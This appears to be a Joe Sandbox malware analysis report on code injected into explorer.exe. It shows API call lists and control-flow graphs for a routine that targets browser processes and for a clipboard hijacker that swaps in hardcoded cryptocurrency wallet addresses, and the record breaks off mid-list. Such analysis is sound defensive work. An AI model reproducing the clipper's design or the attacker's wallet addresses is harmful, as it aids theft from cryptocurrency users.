                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$FileHeapHttpInfoQueryRead$AllocProcess
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 714119200-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 384de69ec04138204dab6b61158154f53a495085d1ff4d816daf9c9824de2aa6
                                                                                                                                                                                                                                                    • Instruction ID: b339417a4a4973f677cb49c61bdddb762176dd0981efcb07f9ec5f046d77c353
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 384de69ec04138204dab6b61158154f53a495085d1ff4d816daf9c9824de2aa6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E516272719685C6EB608F16F81876A63A0FB88BC9F448465DE8E53B94DF3CC5458B10
                                                                                                                                                                                                                                                    Function 10D79EF0 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 95stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32 ref: 10D79F33
                                                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI ref: 10D79F3E
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D79F51
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 10D79F92
                                                                                                                                                                                                                                                      • Part of subcall function 10D74CF0: StrStrIA.SHLWAPI ref: 10D74D15
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D79FA7
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D79FC0
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D79FDE
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D79FFC
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D7A01A
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 10D7A038
                                                                                                                                                                                                                                                      • Part of subcall function 10D79EA0: CreateMutexA.KERNEL32 ref: 10D79EB0
                                                                                                                                                                                                                                                      • Part of subcall function 10D79EA0: CloseHandle.KERNEL32 ref: 10D79EC0
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 10D7A069
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                                                    • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 936357808-3480109235
                                                                                                                                                                                                                                                    • Opcode ID: 7e07e750c368bb52da0f15a04d367e8644eb19928775899e1b931657779b15ad
                                                                                                                                                                                                                                                    • Instruction ID: c02577ff76e5b3319cf333c7b839ce50155ca2df09bcc9857e6fbab518cf1a1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e07e750c368bb52da0f15a04d367e8644eb19928775899e1b931657779b15ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 434150B5314A4182EB14EFF1FC413D963A5FF8878CF989166E98A46164EFBCD184C321
                                                                                                                                                                                                                                                    Function 0F4B9EF0 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 95stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32 ref: 0F4B9F33
                                                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI ref: 0F4B9F3E
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4B9F51
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 0F4B9F92
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4CF0: StrStrIA.SHLWAPI ref: 0F4B4D15
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4B9FA7
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4B9FC0
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4B9FDE
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4B9FFC
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4BA01A
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0F4BA038
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B9EA0: CreateMutexA.KERNEL32 ref: 0F4B9EB0
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B9EA0: CloseHandle.KERNEL32 ref: 0F4B9EC0
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 0F4BA069
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                                                    • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 936357808-3480109235
                                                                                                                                                                                                                                                    • Opcode ID: 7e07e750c368bb52da0f15a04d367e8644eb19928775899e1b931657779b15ad
                                                                                                                                                                                                                                                    • Instruction ID: 90424604d5f83bb4ccaea3fc7d3cb71877388964911bba49777a036e4ac4ec6c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e07e750c368bb52da0f15a04d367e8644eb19928775899e1b931657779b15ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4411F25614B0291EB64EF62A8543EB73A5EF88795F84503FDD4A46A26EF3CC149E320
                                                                                                                                                                                                                                                    Function 0E909EF0 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 95stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32 ref: 0E909F33
                                                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI ref: 0E909F3E
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E909F51
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 0E909F92
                                                                                                                                                                                                                                                      • Part of subcall function 0E904CF0: StrStrIA.SHLWAPI ref: 0E904D15
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E909FA7
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E909FC0
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E909FDE
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E909FFC
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E90A01A
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32 ref: 0E90A038
                                                                                                                                                                                                                                                      • Part of subcall function 0E909EA0: CreateMutexA.KERNEL32 ref: 0E909EB0
                                                                                                                                                                                                                                                      • Part of subcall function 0E909EA0: CloseHandle.KERNEL32 ref: 0E909EC0
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 0E90A069
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                                                    • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 936357808-3480109235
                                                                                                                                                                                                                                                    • Opcode ID: 7e07e750c368bb52da0f15a04d367e8644eb19928775899e1b931657779b15ad
                                                                                                                                                                                                                                                    • Instruction ID: 2b901aa23ba26176c0c715ac57ac23efec1f9b79c72bc2a5b7ef084f1968bf3a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e07e750c368bb52da0f15a04d367e8644eb19928775899e1b931657779b15ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43416171324A8595EF14EF65F84479923E8FFC8B84FC41869DA0AA71A4EF7CC544CB11
                                                                                                                                                                                                                                                    Function 10D77DE0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 836 10d77de0-10d77e0a call 10d78430 839 10d77e10-10d77e46 call 10d78390 call 10d62e40 call 10d77cd0 call 10d784c0 836->839 848 10d77eab-10d77ed8 call 10d62e40 call 10d77cd0 call 10d784c0 839->848 849 10d77e48-10d77ea6 call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 839->849 862 10d77f3d-10d77f6a call 10d62e40 call 10d77cd0 call 10d784c0 848->862 863 10d77eda-10d77f38 call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 848->863 849->848 883 10d77fcf-10d77ffc call 10d62e40 call 10d77cd0 call 10d784c0 862->883 884 10d77f6c-10d77fca call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 862->884 863->862 905 10d78061-10d7808e call 10d62e40 call 10d77cd0 call 10d784c0 883->905 906 10d77ffe-10d7805c call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 883->906 884->883 925 10d780f3-10d78120 call 10d62e40 call 10d77cd0 call 10d784c0 905->925 926 10d78090-10d780ee call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 905->926 906->905 946 10d78185-10d781b2 call 10d62e40 call 10d77cd0 call 10d784c0 925->946 947 10d78122-10d78180 call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 925->947 926->925 967 10d78217-10d78244 call 10d62e40 call 10d77cd0 call 10d784c0 946->967 968 10d781b4-10d78212 call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 946->968 947->946 988 10d78246-10d782a4 call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 967->988 989 10d782a9-10d782d6 call 10d62e40 call 10d77cd0 call 10d784c0 967->989 968->967 988->989 1009 10d7833b-10d7834a Sleep call 10d61200 989->1009 1010 10d782d8-10d78336 call 10d61100 call 10d62e40 call 10d77cd0 call 10d78530 call 10d62e40 call 10d78580 call 10d61200 989->1010 1015 10d7834f 1009->1015 1010->1009 1015->839
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 10D78390: OpenClipboard.USER32 ref: 10D783A1
                                                                                                                                                                                                                                                      • Part of subcall function 10D78390: GetClipboardData.USER32 ref: 10D783B3
                                                                                                                                                                                                                                                      • Part of subcall function 10D78390: GlobalLock.KERNEL32 ref: 10D783C4
                                                                                                                                                                                                                                                      • Part of subcall function 10D78390: GlobalUnlock.KERNEL32 ref: 10D783D5
                                                                                                                                                                                                                                                      • Part of subcall function 10D78390: CloseClipboard.USER32 ref: 10D783DB
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: GlobalAlloc.KERNEL32 ref: 10D785A8
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: GlobalLock.KERNEL32 ref: 10D785BF
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: GlobalUnlock.KERNEL32 ref: 10D785D7
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: OpenClipboard.USER32 ref: 10D785DF
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: EmptyClipboard.USER32 ref: 10D785E5
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: SetClipboardData.USER32 ref: 10D785F3
                                                                                                                                                                                                                                                      • Part of subcall function 10D78580: CloseClipboard.USER32 ref: 10D785F9
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 10D78340
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 10D78090
                                                                                                                                                                                                                                                    • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 10D782D8
                                                                                                                                                                                                                                                    • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 10D781B4
                                                                                                                                                                                                                                                    • LYfS7Pc4oqUbFaSEqfAvffWmc7GSM9NBZE, xrefs: 10D77FFE
                                                                                                                                                                                                                                                    • TQ1BXJe8DqPeSPoV9BV5TFxryMPuxkruj3, xrefs: 10D77F6C
                                                                                                                                                                                                                                                    • 0x2dd646c22bd525dc6ae0cea64737686d84742f54, xrefs: 10D77EDA
                                                                                                                                                                                                                                                    • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 10D78246
                                                                                                                                                                                                                                                    • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 10D78122
                                                                                                                                                                                                                                                    • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 10D77E48
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                                    • String ID: 0x2dd646c22bd525dc6ae0cea64737686d84742f54$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LYfS7Pc4oqUbFaSEqfAvffWmc7GSM9NBZE$TQ1BXJe8DqPeSPoV9BV5TFxryMPuxkruj3$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                                                    • API String ID: 2992153386-3662614053
                                                                                                                                                                                                                                                    • Opcode ID: cbdbc20598319807a6175650fe6bd0cb0590fd8f285802e006301808d91021f6
                                                                                                                                                                                                                                                    • Instruction ID: e8aca67700ca07e9ddb1afecbde32afb57fee95bb9b15338a4c6b0e3877ea3d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbdbc20598319807a6175650fe6bd0cb0590fd8f285802e006301808d91021f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7D15179711A46A9DF00DFB1E4562EC2326E7597CCFC58422AE0D9BA98FF74D209C360
                                                                                                                                                                                                                                                    Function 0F4B7DE0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 639 f4b7de0-f4b7e0a call f4b8430 642 f4b7e10-f4b7e46 call f4b8390 call f4a2e40 call f4b7cd0 call f4b84c0 639->642 651 f4b7eab-f4b7ed8 call f4a2e40 call f4b7cd0 call f4b84c0 642->651 652 f4b7e48-f4b7ea6 call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 642->652 665 f4b7eda-f4b7f38 call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 651->665 666 f4b7f3d-f4b7f6a call f4a2e40 call f4b7cd0 call f4b84c0 651->666 652->651 665->666 686 f4b7fcf-f4b7ffc call f4a2e40 call f4b7cd0 call f4b84c0 666->686 687 f4b7f6c-f4b7fca call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 666->687 707 f4b7ffe-f4b805c call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 686->707 708 f4b8061-f4b808e call f4a2e40 call f4b7cd0 call f4b84c0 686->708 687->686 707->708 729 f4b80f3-f4b8120 call f4a2e40 call f4b7cd0 call f4b84c0 708->729 730 f4b8090-f4b80ee call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 708->730 749 f4b8122-f4b8180 call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 729->749 750 f4b8185-f4b81b2 call f4a2e40 call f4b7cd0 call f4b84c0 729->750 730->729 749->750 770 f4b8217-f4b8244 call f4a2e40 call f4b7cd0 call f4b84c0 750->770 771 f4b81b4-f4b8212 call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 750->771 792 f4b82a9-f4b82d6 call f4a2e40 call f4b7cd0 call f4b84c0 770->792 793 f4b8246-f4b82a4 call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 770->793 771->770 812 f4b833b-f4b834a Sleep call f4a1200 792->812 813 f4b82d8-f4b8336 call f4a1100 call f4a2e40 call f4b7cd0 call f4b8530 call f4a2e40 call f4b8580 call f4a1200 792->813 793->792 818 f4b834f 812->818 813->812 818->642
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8390: OpenClipboard.USER32 ref: 0F4B83A1
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8390: GetClipboardData.USER32 ref: 0F4B83B3
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8390: GlobalLock.KERNEL32 ref: 0F4B83C4
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8390: GlobalUnlock.KERNEL32 ref: 0F4B83D5
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8390: CloseClipboard.USER32 ref: 0F4B83DB
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: GlobalAlloc.KERNEL32 ref: 0F4B85A8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: GlobalLock.KERNEL32 ref: 0F4B85BF
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: GlobalUnlock.KERNEL32 ref: 0F4B85D7
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: OpenClipboard.USER32 ref: 0F4B85DF
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: EmptyClipboard.USER32 ref: 0F4B85E5
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: SetClipboardData.USER32 ref: 0F4B85F3
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B8580: CloseClipboard.USER32 ref: 0F4B85F9
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0F4B8340
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0F4B8122
                                                                                                                                                                                                                                                    • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0F4B8246
                                                                                                                                                                                                                                                    • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0F4B81B4
                                                                                                                                                                                                                                                    • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0F4B82D8
                                                                                                                                                                                                                                                    • 0x2dd646c22bd525dc6ae0cea64737686d84742f54, xrefs: 0F4B7EDA
                                                                                                                                                                                                                                                    • LYfS7Pc4oqUbFaSEqfAvffWmc7GSM9NBZE, xrefs: 0F4B7FFE
                                                                                                                                                                                                                                                    • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0F4B7E48
                                                                                                                                                                                                                                                    • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0F4B8090
                                                                                                                                                                                                                                                    • TQ1BXJe8DqPeSPoV9BV5TFxryMPuxkruj3, xrefs: 0F4B7F6C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                                    • String ID: 0x2dd646c22bd525dc6ae0cea64737686d84742f54$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LYfS7Pc4oqUbFaSEqfAvffWmc7GSM9NBZE$TQ1BXJe8DqPeSPoV9BV5TFxryMPuxkruj3$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                                                    • API String ID: 2992153386-3662614053
                                                                                                                                                                                                                                                    • Opcode ID: cbdbc20598319807a6175650fe6bd0cb0590fd8f285802e006301808d91021f6
                                                                                                                                                                                                                                                    • Instruction ID: e44a9b689816046f9b56597e4e5fdcd0023c506617e8c5115c306712cb278d52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbdbc20598319807a6175650fe6bd0cb0590fd8f285802e006301808d91021f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82D10A61711B46A4EF10EFA6D4542ED2326A7A57CCFC0402F9E0E5BE5AFE79C209D360
                                                                                                                                                                                                                                                    Function 0E907DE0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 442 e907de0-e907e0a call e908430 445 e907e10-e907e46 call e908390 call e8f2e40 call e907cd0 call e9084c0 442->445 454 e907e48-e907ea6 call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 445->454 455 e907eab-e907ed8 call e8f2e40 call e907cd0 call e9084c0 445->455 454->455 469 e907eda-e907f38 call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 455->469 470 e907f3d-e907f6a call e8f2e40 call e907cd0 call e9084c0 455->470 469->470 489 e907f6c-e907fca call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 470->489 490 e907fcf-e907ffc call e8f2e40 call e907cd0 call e9084c0 470->490 489->490 510 e908061-e90808e call e8f2e40 call e907cd0 call e9084c0 490->510 511 e907ffe-e90805c call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 490->511 531 e908090-e9080ee call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 510->531 532 e9080f3-e908120 call e8f2e40 call e907cd0 call e9084c0 510->532 511->510 531->532 552 e908122-e908180 call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 532->552 553 e908185-e9081b2 call e8f2e40 call e907cd0 call e9084c0 532->553 552->553 573 e9081b4-e908212 call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 553->573 574 e908217-e908244 call e8f2e40 call e907cd0 call e9084c0 553->574 573->574 594 e908246-e9082a4 call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 574->594 595 e9082a9-e9082d6 call e8f2e40 call e907cd0 call e9084c0 574->595 594->595 615 e9082d8-e908336 call e8f1100 call e8f2e40 call e907cd0 call e908530 call e8f2e40 call e908580 call e8f1200 595->615 616 e90833b-e90834a Sleep call e8f1200 595->616 615->616 621 e90834f 616->621 621->445
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E908390: OpenClipboard.USER32 ref: 0E9083A1
                                                                                                                                                                                                                                                      • Part of subcall function 0E908390: GetClipboardData.USER32 ref: 0E9083B3
                                                                                                                                                                                                                                                      • Part of subcall function 0E908390: GlobalLock.KERNEL32 ref: 0E9083C4
                                                                                                                                                                                                                                                      • Part of subcall function 0E908390: GlobalUnlock.KERNEL32 ref: 0E9083D5
                                                                                                                                                                                                                                                      • Part of subcall function 0E908390: CloseClipboard.USER32 ref: 0E9083DB
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: GlobalAlloc.KERNEL32 ref: 0E9085A8
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: GlobalLock.KERNEL32 ref: 0E9085BF
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: GlobalUnlock.KERNEL32 ref: 0E9085D7
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: OpenClipboard.USER32 ref: 0E9085DF
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: EmptyClipboard.USER32 ref: 0E9085E5
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: SetClipboardData.USER32 ref: 0E9085F3
                                                                                                                                                                                                                                                      • Part of subcall function 0E908580: CloseClipboard.USER32 ref: 0E9085F9
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0E908340
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0E907E48
                                                                                                                                                                                                                                                    • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0E908122
                                                                                                                                                                                                                                                    • LYfS7Pc4oqUbFaSEqfAvffWmc7GSM9NBZE, xrefs: 0E907FFE
                                                                                                                                                                                                                                                    • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0E9081B4
                                                                                                                                                                                                                                                    • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0E9082D8
                                                                                                                                                                                                                                                    • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0E908090
                                                                                                                                                                                                                                                    • TQ1BXJe8DqPeSPoV9BV5TFxryMPuxkruj3, xrefs: 0E907F6C
